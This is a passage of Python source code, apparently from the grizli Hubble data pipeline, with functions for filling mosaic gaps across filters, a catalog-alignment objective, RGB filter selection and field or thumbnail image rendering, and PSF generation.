fp.close()
def fill_filter_mosaics(field_root):
"""
Fill field mosaics with the average value taken from other filters so that all images have the same coverage
Parameters
----------
field_root : str
"""
import glob
import os
import scipy.ndimage as nd
import astropy.io.fits as pyfits
mosaic_files = glob.glob('{0}-ir_dr?_sci.fits'.format(field_root))
mosaic_files += glob.glob('{0}-opt_dr?_sci.fits'.format(field_root))
if len(mosaic_files) == 0:
return False
ir = pyfits.open(mosaic_files[0])
filter_files = glob.glob('{0}-f[01]*sci.fits'.format(field_root))
# If not IR filters, try optical
if len(filter_files) == 0:
filter_files = glob.glob('{0}-f[5-8]*sci.fits'.format(field_root))
for file in filter_files:
print(file)
sci = pyfits.open(file, mode='update')
wht = pyfits.open(file.replace('sci', 'wht'))
mask = wht[0].data == 0
scale = ir[0].header['PHOTFLAM']/sci[0].header['PHOTFLAM']
sci[0].data[mask] = ir[0].data[mask]*scale
sci.flush()
# Fill empty parts of IR mosaic with optical if both available
if len(mosaic_files) == 2:
print('Fill -ir- mosaic with -opt-')
ir_sci = pyfits.open(mosaic_files[0], mode='update')
ir_wht = pyfits.open(mosaic_files[0].replace('sci', 'wht'),
mode='update')
opt_sci = pyfits.open(mosaic_files[1])
opt_wht = pyfits.open(mosaic_files[1].replace('sci', 'wht'))
opt_sci_data = opt_sci[0].data
opt_wht_data = opt_wht[0].data
if opt_sci_data.shape[0] == 2*ir_wht[0].data.shape[0]:
# Half pixel scale
kern = np.ones((2, 2))
num = nd.convolve(opt_sci_data*opt_wht_data, kern)[::2, ::2]
den = nd.convolve(opt_wht_data, kern)[::2, ::2]
opt_sci_data = num/den
opt_sci_data[den <= 0] = 0
opt_wht_data = den
mask = ir_wht[0].data == 0
scale = opt_sci[0].header['PHOTFLAM']/ir_sci[0].header['PHOTFLAM']
ir_sci[0].data[mask] = opt_sci_data[mask]*scale
ir_wht[0].data[mask] = opt_wht_data[mask]/scale**2
ir_sci.flush()
ir_wht.flush()
return True
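# The fill above scales by the PHOTFLAM ratio so the pasted pixels are in the
# target image's count-rate units, e.g. (sketch of the operation performed):
#
#   scale = ir[0].header['PHOTFLAM'] / sci[0].header['PHOTFLAM']
#   sci[0].data[wht[0].data == 0] = ir[0].data[wht[0].data == 0] * scale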
######################
# Objective function for catalog shifts
def _objfun_align(p0, tab, ref_tab, ref_err, shift_only, ret):
#from grizli.utils import transform_wcs
from scipy.special import huber
from scipy.stats import t as student
from scipy.stats import norm
import numpy as np
import matplotlib.pyplot as plt
from ..utils import transform_wcs
N = len(tab)
trans = np.reshape(p0, (N, -1)) # /10.
#trans[0,:] = [0,0,0,1]
sh = trans.shape
if sh[1] == 2:
# Shift only
pscl = np.array([10., 10.])
trans = np.hstack([trans/pscl, np.zeros((N, 1)), np.ones((N, 1))])
elif sh[1] == 3:
# Shift + rot
pscl = np.array([10., 10., 100.])
trans = np.hstack([trans/pscl, np.ones((N, 1))])
elif sh[1] == 4:
# Shift + rot + scale
pscl = np.array([10., 10., 100., 100])
trans = trans/pscl
print(trans)
#N = trans.shape[0]
trans_wcs = {}
trans_rd = {}
for ix, i in enumerate(tab):
if (ref_err > 0.1) & (ix == 0):
trans_wcs[i] = transform_wcs(tab[i]['wcs'], translation=[0, 0], rotation=0., scale=1.)
trans_rd[i] = trans_wcs[i].all_pix2world(tab[i]['xy'], 1)
else:
trans_wcs[i] = transform_wcs(tab[i]['wcs'], translation=list(trans[ix, :2]), rotation=trans[ix, 2]/180*np.pi, scale=trans[ix, 3])
trans_rd[i] = trans_wcs[i].all_pix2world(tab[i]['xy'], 1)
# Cosine declination factor
cosd = np.cos(np.median(trans_rd[i][:, 1]/180*np.pi))
if ret == 'field':
for ix, i in enumerate(tab):
print(tab[i]['wcs'])
plt.scatter(trans_rd[i][:, 0], trans_rd[i][:, 1], alpha=0.8, marker='x')
continue
for m in tab[i]['match_idx']:
ix, jx = tab[i]['match_idx'][m]
if m < 0:
continue
else:
# continue
dx_i = (trans_rd[i][ix, 0] - trans_rd[m][jx, 0])*3600.*cosd
dy_i = (trans_rd[i][ix, 1] - trans_rd[m][jx, 1])*3600.
for j in range(len(ix)):
if j == 0:
p = plt.plot(trans_rd[i][j, 0]+np.array([0, dx_i[j]/60.]), trans_rd[i][j, 1]+np.array([0, dy_i[j]/60.]), alpha=0.8)
c = p[0].get_color()
else:
p = plt.plot(trans_rd[i][j, 0]+np.array([0, dx_i[j]/60.]), trans_rd[i][j, 1]+np.array([0, dy_i[j]/60.]), alpha=0.8, color=c)
return True
trans_wcs = {}
trans_rd = {}
for ix, i in enumerate(tab):
trans_wcs[i] = transform_wcs(tab[i]['wcs'],
translation=list(trans[ix, :2]),
rotation=trans[ix, 2]/180*np.pi,
scale=trans[ix, 3])
trans_rd[i] = trans_wcs[i].all_pix2world(tab[i]['xy'], 1)
dx, dy = [], []
for i in tab:
mcount = 0
for m in tab[i]['match_idx']:
ix, jx = tab[i]['match_idx'][m]
if m < 0:
continue
else:
# continue
dx_i = (trans_rd[i][ix, 0] - trans_rd[m][jx, 0])*3600.*cosd
dy_i = (trans_rd[i][ix, 1] - trans_rd[m][jx, 1])*3600.
mcount += len(dx_i)
dx.append(dx_i/0.01)
dy.append(dy_i/0.01)
if ret == 'plot':
plt.gca().scatter(dx_i, dy_i, marker='.', alpha=0.1)
# Reference sources
if -1 in tab[i]['match_idx']:
m = -1
ix, jx = tab[i]['match_idx'][m]
dx_i = (trans_rd[i][ix, 0] - tab[i]['ref_tab']['ra'][jx])*3600.*cosd
dy_i = (trans_rd[i][ix, 1] - tab[i]['ref_tab']['dec'][jx])*3600.
rcount = len(dx_i)
mcount = np.maximum(mcount, 1)
rcount = np.maximum(rcount, 1)
dx.append(dx_i/(ref_err/np.clip(mcount/rcount, 1, 1000)))
dy.append(dy_i/(ref_err/np.clip(mcount/rcount, 1, 1000)))
if ret.startswith('plotx') & (ref_err < 0.1):
plt.gca().scatter(dx_i, dy_i, marker='+', color='k', alpha=0.3, zorder=1000)
# Residuals
dr = np.sqrt(np.hstack(dx)**2+np.hstack(dy)**2)
if ret == 'huber': # Minimize Huber loss function
loss = huber(1, dr).sum()*2
return loss
elif ret == 'student': # student-t log prob (maximize)
df = 2.5 # more power in wings than normal
lnp = student.logpdf(dr, df, loc=0, scale=1).sum()
return lnp
else: # Normal log prob (maximize)
lnp = norm.logpdf(dr, loc=0, scale=1).sum()
return lnp
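# For ret='huber' the function minimizes twice the summed Huber loss of the
# normalized residuals r = dr / sigma:  rho(r) = r**2 / 2 for |r| <= 1 and
# |r| - 1/2 otherwise (scipy.special.huber with delta=1), which limits the
# influence of outlier matches relative to a pure least-squares objective.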
def get_rgb_filters(filter_list, force_ir=False, pure_sort=False):
"""
Compute which filters to use to make an RGB cutout
Parameters
----------
filter_list : list
All available filters
force_ir : bool
Only use IR filters.
pure_sort : bool
Don't use preference for red filters, just use order they appear
Returns
-------
rgb_filt : [r, g, b]
List of filters to use
"""
from collections import OrderedDict
# Sort by wavelength
for_sort = OrderedDict()
use_filters = []
ir_filters = []
# Preferred combinations
filter_list_lower = [f.lower() for f in filter_list]
rpref = ['h', 'f160w', 'f140w']
gpref = ['j', 'yj', 'f125w', 'f110w', 'f105w', 'f098m']
bpref = ['opt', 'visr', 'visb', 'f814w', 'f814wu', 'f606w', 'f606wu', 'f775w', 'f850lp', 'f435w']
pref_list = [None, None, None]
has_pref = 0
for i, pref in enumerate([rpref, gpref, bpref]):
for f in pref:
if f in filter_list_lower:
pref_list[i] = f
has_pref += 1
break
if has_pref == 3:
print('Use preferred r/g/b combination: {0}'.format(pref_list))
return pref_list
for f in filter_list:
if f == 'ir':
continue
elif f == 'opt':
continue
if f == 'uv':
val = 'f0300'
elif f == 'visb':
val = 'f0435'
elif f == 'visr':
val = 'f0814'
elif f == 'y':
val = 'f1000'
elif f == 'yj':
val = 'f1100'
elif f == 'j':
val = 'f1250'
elif f == 'h':
val = 'f1500'
elif f[1] in '01':
val = f[:4]+'0'
else:
val = 'f0'+f[1:4]
# Red filters (>6000)
if val > 'f07':
if (val >= 'f09') & (force_ir):
ir_filters.append(f)
use_filters.append(f)
for_sort[f] = val
pop_indices = []
joined = {'uv': '23', 'visb': '45', 'visr': '678',
'y': ['f098m', 'f105w'],
'j': ['f110w', 'f125w'],
'h': ['f140w', 'f160w']}
for j in joined:
if j in use_filters:
indices = []
for f in use_filters:
if f in joined:
continue
if j in 'yjh':
if f in joined[j]:
indices.append(use_filters.index(f))
else:
if f[1] in joined[j]:
indices.append(use_filters.index(f))
if len(indices) == len(use_filters)-1:
# All filters are in a given group so pop the group
pop_indices.append(use_filters.index(j))
else:
pop_indices.extend(indices)
pop_indices.sort()
for i in pop_indices[::-1]:
filt_i = use_filters.pop(i)
for_sort.pop(filt_i)
# Only one filter
if len(use_filters) == 1:
f = use_filters[0]
return [f, f, f]
if len(filter_list) == 1:
f = filter_list[0]
return [f, f, f]
if (len(use_filters) == 0) & (len(filter_list) > 0):
so = np.argsort(filter_list)
f = filter_list[so[-1]]
return [f, f, f]
# Preference for red filters
if (len(ir_filters) >= 3) & (not pure_sort):
use_filters = ir_filters
for k in list(for_sort.keys()):
if k not in ir_filters:
p = for_sort.pop(k)
so = np.argsort(list(for_sort.values()))
waves = np.cast[float]([for_sort[f][1:] for f in for_sort])
# Reddest
rfilt = use_filters[so[-1]]
# Bluest
bfilt = use_filters[so[0]]
if len(use_filters) == 2:
return [rfilt, 'sum', bfilt]
elif len(use_filters) == 3:
gfilt = use_filters[so[1]]
return [rfilt, gfilt, bfilt]
else:
# Closest to average wavelength
mean = np.mean([waves.max(), waves.min()])
ix_g = np.argmin(np.abs(waves-mean))
gfilt = use_filters[ix_g]
return [rfilt, gfilt, bfilt]
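# Example (hypothetical filter list): with ['f160w', 'f125w', 'f814w']
# available, the preferred-combination branch above returns
# ['f160w', 'f125w', 'f814w'] for the r/g/b channels.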
TICKPARAMS = dict(axis='both', colors='w', which='both')
def field_rgb(root='j010514+021532', xsize=6, output_dpi=None, HOME_PATH='./', show_ir=True, pl=1, pf=1, scl=1, scale_ab=None, rgb_scl=[1, 1, 1], ds9=None, force_ir=False, filters=None, add_labels=True, output_format='jpg', rgb_min=-0.01, xyslice=None, pure_sort=False, verbose=True, force_rgb=None, suffix='.field', mask_empty=False, tick_interval=60, timestamp=False, mw_ebv=0, use_background=False, tickparams=TICKPARAMS, fill_black=False, ref_spectrum=None, gzext='', full_dimensions=False, invert=False, get_rgb_array=False, get_images=False):
"""
RGB image of the field mosaics
"""
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
#import montage_wrapper
from astropy.visualization import make_lupton_rgb
try:
from .. import utils
except:
from grizli import utils
if HOME_PATH is not None:
phot_file = '{0}/{1}/Prep/{1}_phot.fits'.format(HOME_PATH, root)
if not os.path.exists(phot_file):
print('Photometry file {0} not found.'.format(phot_file))
return False
phot = utils.GTable.gread(phot_file)
sci_files = glob.glob('{0}/{1}/Prep/{1}-[ofuvyjh]*sci.fits{2}'.format(HOME_PATH, root, gzext))
PATH_TO = '{0}/{1}/Prep'.format(HOME_PATH, root)
else:
PATH_TO = './'
sci_files = glob.glob('./{1}-[fuvyjho]*sci.fits{2}'.format(PATH_TO, root, gzext))
print('PATH: {0}, files:{1}'.format(PATH_TO, sci_files))
if filters is None:
filters = [file.split('_')[-3].split('-')[-1] for file in sci_files]
if show_ir:
filters += ['ir']
#mag_auto = 23.9-2.5*np.log10(phot['flux_auto'])
ims = {}
for f in filters:
try:
img = glob.glob('{0}/{1}-{2}_dr?_sci.fits{3}'.format(PATH_TO, root, f, gzext))[0]
except:
print('Failed: {0}/{1}-{2}_dr?_sci.fits{3}'.format(PATH_TO, root, f, gzext))
try:
ims[f] = pyfits.open(img)
if 'IMGMED' in ims[f][0].header:
imgmed = ims[f][0].header['IMGMED']
ims[f][0].data -= imgmed
else:
imgmed = 0
bkg_file = img.split('_dr')[0]+'_bkg.fits'
if use_background & os.path.exists(bkg_file):
print('Subtract background: '+bkg_file)
bkg = pyfits.open(bkg_file)
ims[f][0].data -= bkg[0].data - imgmed
except:
continue
filters = list(ims.keys())
wcs = pywcs.WCS(ims[filters[-1]][0].header)
pscale = utils.get_wcs_pscale(wcs)
minor = MultipleLocator(tick_interval/pscale)
if force_rgb is None:
rf, gf, bf = get_rgb_filters(filters, force_ir=force_ir, pure_sort=pure_sort)
else:
rf, gf, bf = force_rgb
logstr = '# field_rgb {0}: r {1} / g {2} / b {3}'.format(root, rf, gf, bf)
utils.log_comment(utils.LOGFILE, logstr, verbose=verbose)
#pf = 1
#pl = 1
if scale_ab is not None:
zp_r = utils.calc_header_zeropoint(ims[rf], ext=0)
scl = 10**(-0.4*(zp_r-5-scale_ab))
scl *= (0.06/pscale)**2
if mw_ebv > 0:
MW_F99 = utils.MW_F99(mw_ebv*utils.MW_RV, r_v=utils.MW_RV)
else:
MW_F99 = None
rimg = ims[rf][0].data * (ims[rf][0].header['PHOTFLAM']/5.e-20)**pf * (ims[rf][0].header['PHOTPLAM']/1.e4)**pl*scl*rgb_scl[0]
if MW_F99 is not None:
rmw = 10**(0.4*(MW_F99(np.array([ims[rf][0].header['PHOTPLAM']]))))[0]
print('MW_EBV={0:.3f}, {1}: {2:.2f}'.format(mw_ebv, rf, rmw))
rimg *= rmw
if bf == 'sum':
bimg = rimg
elif bf == rf:
bimg = rimg
else:
bimg = ims[bf][0].data * (ims[bf][0].header['PHOTFLAM']/5.e-20)**pf * (ims[bf][0].header['PHOTPLAM']/1.e4)**pl*scl*rgb_scl[2]
if MW_F99 is not None:
bmw = 10**(0.4*(MW_F99(np.array([ims[bf][0].header['PHOTPLAM']]))))[0]
print('MW_EBV={0:.3f}, {1}: {2:.2f}'.format(mw_ebv, bf, bmw))
bimg *= bmw
# Double-acs
if bimg.shape != rimg.shape:
import scipy.ndimage as nd
kern = np.ones((2, 2))
bimg = nd.convolve(bimg, kern)[::2, ::2]
if gf == 'sum':
gimg = (rimg+bimg)/2.
elif gf == rf:
gimg = rimg
elif gf == bf:
gimg = bimg
else:
gscl = (ims[gf][0].header['PHOTFLAM']/5.e-20)**pf
gscl *= (ims[gf][0].header['PHOTPLAM']/1.e4)**pl
gimg = ims[gf][0].data * gscl * scl * rgb_scl[1] # * 1.5
if MW_F99 is not None:
gmw = 10**(0.4*(MW_F99(np.array([ims[gf][0].header['PHOTPLAM']]))))[0]
print('MW_EBV={0:.3f}, {1}: {2:.2f}'.format(mw_ebv, gf, gmw))
gimg *= gmw
rmsk = rimg == 0
gmsk = gimg == 0
bmsk = bimg == 0
if gimg.shape != rimg.shape:
import scipy.ndimage as nd
kern = np.ones((2, 2))
gimg = nd.convolve(gimg, kern)[::2, ::2]
gmsk = gmsk[::2,::2]
# Scale by reference synphot spectrum
if ref_spectrum is not None:
import pysynphot as S
try:
_obsm = [utils.get_filter_obsmode(filter=_f) for _f in [rf, gf, bf]]
_bp = [S.ObsBandpass(_m) for _m in _obsm]
_bpf = [ref_spectrum.integrate_filter(_b)/_b.pivot()**2 for _b in _bp]
gimg *= _bpf[0]/_bpf[1]
bimg *= _bpf[0]/_bpf[2]
print('ref_spectrum supplied: {0}*{1:.2f} {2}*{3:.2f}'.format(gf, _bpf[0]/_bpf[1], bf, _bpf[0]/_bpf[2]))
except:
pass
if mask_empty:
mask = rmsk | gmsk | bmsk
print('Mask empty pixels in any channel: {0}'.format(mask.sum()))
rimg[mask] = 0
gimg[mask] = 0
bimg[mask] = 0
if ds9:
ds9.set('rgb')
ds9.set('rgb channel red')
wcs_header = utils.to_header(pywcs.WCS(ims[rf][0].header))
ds9.view(rimg, header=wcs_header)
ds9.set_defaults()
ds9.set('cmap value 9.75 0.8455')
ds9.set('rgb channel green')
ds9.view(gimg, wcs_header)
ds9.set_defaults()
ds9.set('cmap value 9.75 0.8455')
ds9.set('rgb channel blue')
ds9.view(bimg, wcs_header)
ds9.set_defaults()
ds9.set('cmap value 9.75 0.8455')
ds9.set('rgb channel red')
ds9.set('rgb lock colorbar')
return False
xsl = ysl = None
if show_ir & (not full_dimensions):
# Show only area where IR is available
yp, xp = np.indices(ims[rf][0].data.shape)
wht = pyfits.open(ims[rf].filename().replace('_sci', '_wht'))
mask = wht[0].data > 0
xsl = slice(xp[mask].min(), xp[mask].max())
ysl = slice(yp[mask].min(), yp[mask].max())
rimg = rimg[ysl, xsl]
bimg = bimg[ysl, xsl]
gimg = gimg[ysl, xsl]
if fill_black:
rmsk = rmsk[ysl, xsl]
gmsk = gmsk[ysl, xsl]
bmsk = bmsk[ysl, xsl]
else:
if xyslice is not None:
xsl, ysl = xyslice
rimg = rimg[ysl, xsl]
bimg = bimg[ysl, xsl]
gimg = gimg[ysl, xsl]
if fill_black:
rmsk = rmsk[ysl, xsl]
gmsk = gmsk[ysl, xsl]
bmsk = bmsk[ysl, xsl]
if get_images:
return (rimg, gimg, bimg), (rf, gf, bf)
image = make_lupton_rgb(rimg, gimg, bimg, stretch=0.1, minimum=rgb_min)
if invert:
image = 255-image
if fill_black:
image[rmsk,0] = 0
image[gmsk,1] = 0
image[bmsk,2] = 0
if get_rgb_array:
return image
sh = image.shape
ny, nx, _ = sh
if full_dimensions:
dpi = int(nx/xsize)
xsize = nx/dpi
#print('xsize: ', xsize, ny, nx, dpi)
elif (output_dpi is not None):
xsize = nx/output_dpi
dim = [xsize, xsize/nx*ny]
fig, ax = plt.subplots(1,1,figsize=dim)
ax.imshow(image, origin='lower', extent=(-nx/2, nx/2, -ny/2, ny/2))
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.xaxis.set_major_locator(minor)
ax.yaxis.set_major_locator(minor)
#ax.tick_params(axis='x', colors='w', which='both')
#ax.tick_params(axis='y', colors='w', which='both')
if tickparams:
ax.tick_params(**tickparams)
if add_labels:
ax.text(0.03, 0.97, root, bbox=dict(facecolor='w', alpha=0.8), size=10, ha='left', va='top', transform=ax.transAxes)
ax.text(0.06+0.08*2, 0.02, rf, color='r', bbox=dict(facecolor='w', alpha=1), size=8, ha='center', va='bottom', transform=ax.transAxes)
ax.text(0.06+0.08, 0.02, gf, color='g', bbox=dict(facecolor='w', alpha=1), size=8, ha='center', va='bottom', transform=ax.transAxes)
ax.text(0.06, 0.02, bf, color='b', bbox=dict(facecolor='w', alpha=1), size=8, ha='center', va='bottom', transform=ax.transAxes)
if timestamp:
fig.text(0.97, 0.03, time.ctime(), ha='right', va='bottom', fontsize=5, transform=fig.transFigure, color='w')
if full_dimensions:
ax.axis('off')
fig.tight_layout(pad=0)
dpi = int(nx/xsize/full_dimensions)
fig.savefig('{0}{1}.{2}'.format(root, suffix, output_format), dpi=dpi)
else:
fig.tight_layout(pad=0.1)
fig.savefig('{0}{1}.{2}'.format(root, suffix, output_format))
return xsl, ysl, (rf, gf, bf), fig
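# Example call in the file's own style (hypothetical field name), mirroring
# the commented field_rgb example in make_combined_mosaics above:
#
#   field_rgb('j123456+012345', HOME_PATH=None, show_ir=True,
#             filters=['f160w', 'f125w', 'f814w'], xsize=16)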
#########
THUMB_RGB_PARAMS = {'xsize': 4,
'output_dpi': None,
'rgb_min': -0.01,
'add_labels': False,
'output_format': 'png',
'show_ir': False,
'scl': 2,
'suffix': '.rgb',
'mask_empty': False,
'tick_interval': 1,
'pl': 1, # 1 for f_lambda, 2 for f_nu
}
DRIZZLER_ARGS = {'aws_bucket': False,
'scale_ab': 21.5,
'subtract_median': False,
'theta': 0.,
'pixscale': 0.1,
'pixfrac': 0.33,
'kernel': 'square',
'half_optical_pixscale': True,
'filters': ['f160w', 'f814w', 'f140w', 'f125w', 'f105w',
'f110w', 'f098m', 'f850lp', 'f775w', 'f606w',
'f475w', 'f555w', 'f600lp', 'f390w', 'f350lp'],
'size': 3,
'thumb_height': 1.5,
'rgb_params': THUMB_RGB_PARAMS,
'remove': False,
'include_ir_psf': True,
'combine_similar_filters': False,
'single_output': True}
def make_rgb_thumbnails(root='j140814+565638', ids=None, maglim=21,
drizzler_args=DRIZZLER_ARGS, use_line_wcs=False,
remove_fits=False, skip=True, min_filters=2,
auto_size=False, size_limits=[4, 15], mag=None,
make_segmentation_figure=True):
"""
Make RGB thumbnails in working directory
"""
import matplotlib.pyplot as plt
import astropy.wcs as pywcs
from grizli.aws import aws_drizzler
phot_cat = glob.glob('../Prep/{0}_phot.fits'.format(root))[0]
cat = utils.read_catalog(phot_cat)
if make_segmentation_figure:
plt.ioff()
seg_files = glob.glob('../*/{0}*seg.fits*'.format(root))
if len(seg_files) == 0:
make_segmentation_figure = False
else:
seg = pyfits.open(seg_files[0])
seg_data = seg[0].data
seg_wcs = pywcs.WCS(seg[0].header)
# Randomize seg to get dispersion between neighboring objects
np.random.seed(hash(root) % (10 ** 8))
rnd_ids = np.append([0], np.argsort(np.random.rand(len(cat)))+1)
#rnd_seg = rnd_ids[seg[0].data]
#phot_xy = seg_wcs.all_world2pix(cat['ra'], cat['dec'], 0)
# Count filters
num_filters = 0
for k in cat.meta:
if k.startswith('F') & k.endswith('uJy2dn'):
num_filters += 1
if min_filters > num_filters:
print('# make_rgb_thumbnails: only {0} filters found'.format(num_filters))
return False
if mag is None:
auto_mag = 23.9-2.5*np.log10(cat['flux_auto']*cat['tot_corr'])
# More like surface brightness
try:
mag = 23.9-2.5*np.log10(cat['flux_aper_2'])
mag[~np.isfinite(mag)] = auto_mag[~np.isfinite(mag)]
except:
mag = auto_mag
pixel_scale = cat.meta['ASEC_0']/cat.meta['APER_0']
sx = (cat['xmax']-cat['xmin'])*pixel_scale
sy = (cat['ymax']-cat['ymin'])*pixel_scale
#lim_mag = 23.9-2.5*np.log10(200*np.percentile(cat['fluxerr_aper_4'], 50))
#print('limiting mag: ', lim_mag)
lim_mag = 22.8
extracted_ids = False
if ids is None:
ids = cat['id'][mag < maglim]
elif ids == 'extracted':
extracted_ids = True
# Make thumbnails for extracted objects
beams_files = glob.glob('../Extractions/*beams.fits')
if len(beams_files) == 0:
return False
beams_files.sort()
ids = [int(os.path.basename(file).split('_')[-1].split('.beams')[0]) for file in beams_files]
for id_column in ['id', 'number']:
if id_column in cat.colnames:
break
args = drizzler_args.copy()
N = len(ids)
for i, id in enumerate(ids):
ix = cat[id_column] == id
label = '{0}_{1:05d}'.format(root, id)
thumb_files = glob.glob('../*/{0}.thumb.png'.format(label))
if (skip) & (len(thumb_files) > 0):
print('\n##\n## RGB thumbnail {0} ({1}/{2})\n##'.format(label, i+1, N))
continue
args['scale_ab'] = np.clip(mag[ix][0]-1, 17, lim_mag)
# Use drizzled line image for WCS?
if use_line_wcs:
line_file = glob.glob('../Extractions/{0}.full.fits'.format(label))
# Reset
if 'wcs' in args:
args.pop('wcs')
for k in ['pixfrac', 'kernel']:
if k in drizzler_args:
args[k] = drizzler_args[k]
# Find line extension
msg = '\n# Use WCS from {0}[{1},{2}] (pixfrac={3:.2f}, kernel={4})'
if len(line_file) > 0:
full = pyfits.open(line_file[0])
for ext in full:
if 'EXTNAME' in ext.header:
if ext.header['EXTNAME'] == 'LINE':
try:
wcs = pywcs.WCS(ext.header)
args['wcs'] = wcs
args['pixfrac'] = ext.header['PIXFRAC']
args['kernel'] = ext.header['DRIZKRNL']
print(msg.format(line_file[0],
ext.header['EXTNAME'],
ext.header['EXTVER'], args['pixfrac'],
args['kernel']))
except:
pass
break
if (auto_size) & ('wcs' not in args):
s_i = np.maximum(sx[ix][0], sy[ix][0])
args['size'] = np.ceil(np.clip(s_i,
size_limits[0], size_limits[1]))
print('\n##\n## RGB thumbnail {0} *size={3}* ({1}/{2})\n##'.format(label, i+1, N, args['size']))
else:
print('\n##\n## RGB thumbnail {0} ({1}/{2})\n##'.format(label, i+1, N))
aws_drizzler.drizzle_images(label=label,
ra=cat['ra'][ix][0], dec=cat['dec'][ix][0],
master='local', single_output=True,
make_segmentation_figure=False, **args)
files = glob.glob('{0}.thumb.fits'.format(label))
blot_seg = None
if (make_segmentation_figure) & (len(files) > 0):
th = pyfits.open(files[0], mode='update')
th_wcs = pywcs.WCS(th[0].header)
blot_seg = utils.blot_nearest_exact(seg_data, seg_wcs, th_wcs,
stepsize=-1, scale_by_pixel_area=False)
rnd_seg = rnd_ids[np.cast[int](blot_seg)]*1.
th_ids = np.unique(blot_seg)
sh = th[0].data.shape
yp, xp = np.indices(sh)
thumb_height = 2.
fig = plt.figure(figsize=[thumb_height*sh[1]/sh[0], thumb_height])
ax = fig.add_subplot(111)
rnd_seg[rnd_seg == 0] = np.nan
ax.imshow(rnd_seg, aspect='equal', cmap='terrain_r',
vmin=-0.05*len(cat), vmax=1.05*len(cat))
ax.set_xticklabels([])
ax.set_yticklabels([])
ix = utils.column_values_in_list(cat['number'], th_ids)
xc, yc = th_wcs.all_world2pix(cat['ra'][ix], cat['dec'][ix], 0)
xc = np.clip(xc, 0.09*sh[1], 0.91*sh[1])
yc = np.clip(yc, 0.08*sh[0], 0.92*sh[0])
for th_id, x_i, y_i in zip(cat['number'][ix], xc, yc):
if th_id == 0:
continue
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='w')
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='k', alpha=0.95)
ax.set_xlim(0, sh[1]-1)
ax.set_ylim(0, sh[0]-1)
ax.set_axis_off()
fig.tight_layout(pad=0.01)
fig.savefig('{0}.seg.png'.format(label))
plt.close(fig)
# Append to thumbs file
seg_hdu = pyfits.ImageHDU(data=np.cast[int](blot_seg), name='SEG')
th.append(seg_hdu)
th.writeto('{0}.thumb.fits'.format(label), overwrite=True,
output_verify='fix')
th.close()
if remove_fits > 0:
files = glob.glob('{0}*_dr[cz]*fits'.format(label))
for file in files:
os.remove(file)
def field_psf(root='j020924-044344', PREP_PATH='../Prep', RAW_PATH='../RAW', EXTRACT_PATH='../Extractions', factors=[1, 2, 4], get_drizzle_scale=True, subsample=256, size=6, get_line_maps=False, raise_fault=False, verbose=True, psf_filters=['F098M', 'F110W', 'F105W', 'F125W', 'F140W', 'F160W'], skip=False, make_fits=True, **kwargs):
"""
Generate PSFs for the available filters in a given field
"""
import os
import glob
import astropy.wcs as pywcs
import astropy.io.fits as pyfits
try:
from .. import utils
from ..galfit import psf as gpsf
except:
from grizli import utils
from grizli.galfit import psf as gpsf
os.chdir(PREP_PATH)
drz_str = '{0}-ir_dr?_sci.fits'.format(root)
drz_file = glob.glob(drz_str)
if len(drz_file) == 0:
err = f'Reference file {drz_str} not found.'
if raise_fault:
raise FileNotFoundError(err)
else:
print(err)
return False
else:
drz_file = drz_file[0]
scale = []
pixfrac = []
kernel = []
labels = []
# For the line maps
if get_line_maps:
args_file = os.path.join(EXTRACT_PATH, f'{root}_fit_args.npy')
if not os.path.exists(args_file):
err = 'fit_args.npy not found.'
if raise_fault:
raise FileNotFoundError(err)
else:
print(err)
return False
default = DITHERED_PLINE
# Parameters of the line maps
args = np.load(args_file, allow_pickle=True)[0]
# Line images
pline = args['pline']
for factor in factors:
if 'pixscale' in pline:
scale.append(pline['pixscale']/factor)
else:
scale.append(default['pixscale']/factor)
if 'pixfrac' in pline:
pixfrac.append(pline['pixfrac'])
else:
pixfrac.append(default['pixfrac'])
if 'kernel' in pline:
kernel.append(pline['kernel'])
else:
kernel.append(default['kernel'])
labels.append('LINE{0}'.format(factor))
# Mosaic
im = pyfits.open(drz_file)
drz_wcs = pywcs.WCS(im[0].header)
pscale = utils.get_wcs_pscale(drz_wcs)
sh = im[0].data.shape
if get_drizzle_scale:
rounded = int(np.round(im[0].header['D001SCAL']*1000))/1000.
for factor in factors:
scale.append(rounded/factor)
labels.append('DRIZ{0}'.format(factor))
kernel.append(im[0].header['D001KERN'])
pixfrac.append(im[0].header['D001PIXF'])
# FITS info
visits_file = '{0}_visits.npy'.format(root)
if not os.path.exists(visits_file):
parse_visits(field_root=root, RAW_PATH=RAW_PATH)
visits, groups, info = np.load(visits_file, allow_pickle=True)
# Append "U" to UVIS filters in info
if 'DETECTOR' in info.colnames:
uvis = np.where(info['DETECTOR'] == 'UVIS')[0]
filters = [f for f in info['FILTER']]
for i in uvis:
filters[i] += 'U'
info['FILTER'] = filters
# Average PSF
xp, yp = np.meshgrid(np.arange(0, sh[1], subsample),
np.arange(0, sh[0], subsample))
ra, dec = drz_wcs.all_pix2world(xp, yp, 0)
# Ref images
files = glob.glob('{0}-f[0-9]*sci.fits'.format(root))
if verbose:
print(' ')
hdus = []
for file in files:
filter = file.split(root+'-')[1].split('_')[0]
if filter.upper() not in psf_filters:
continue
if (os.path.exists('{0}-{1}_psf.fits'.format(root, filter))) & skip:
continue
flt_files = list(info['FILE'][info['FILTER'] == filter.upper()])
if len(flt_files) == 0:
# Try to use HDRTAB in drizzled image
flt_files = None
driz_image = file
else:
driz_image = drz_file
driz_hdu = pyfits.open(file)
GP = gpsf.DrizzlePSF(flt_files=flt_files, info=None,
driz_image=driz_image)
hdu = pyfits.HDUList([pyfits.PrimaryHDU()])
hdu[0].header['ROOT'] = root
for scl, pf, kern_i, label in zip(scale, pixfrac, kernel, labels):
ix = 0
psf_f = None
if pf == 0:
kern = 'point'
else:
kern = kern_i
logstr = '# psf {0} {5:6} / {1:.3f}" / pixf: {2} / {3:8} / {4}'
logstr = logstr.format(root, scl, pf, kern, filter, label)
utils.log_comment(utils.LOGFILE, logstr, verbose=verbose)
for ri, di in zip(ra.flatten(), dec.flatten()):
slice_h, wcs_slice = utils.make_wcsheader(ra=ri, dec=di,
size=size, pixscale=scl,
get_hdu=False, theta=0)
# Filters with extended profiles
irext = ['F098M', 'F110W', 'F105W', 'F125W', 'F140W', 'F160W']
get_extended = filter.upper() in irext
try:
psf_i = GP.get_psf(ra=ri, dec=di, filter=filter.upper(),
pixfrac=pf, kernel=kern, verbose=False,
wcs_slice=wcs_slice,
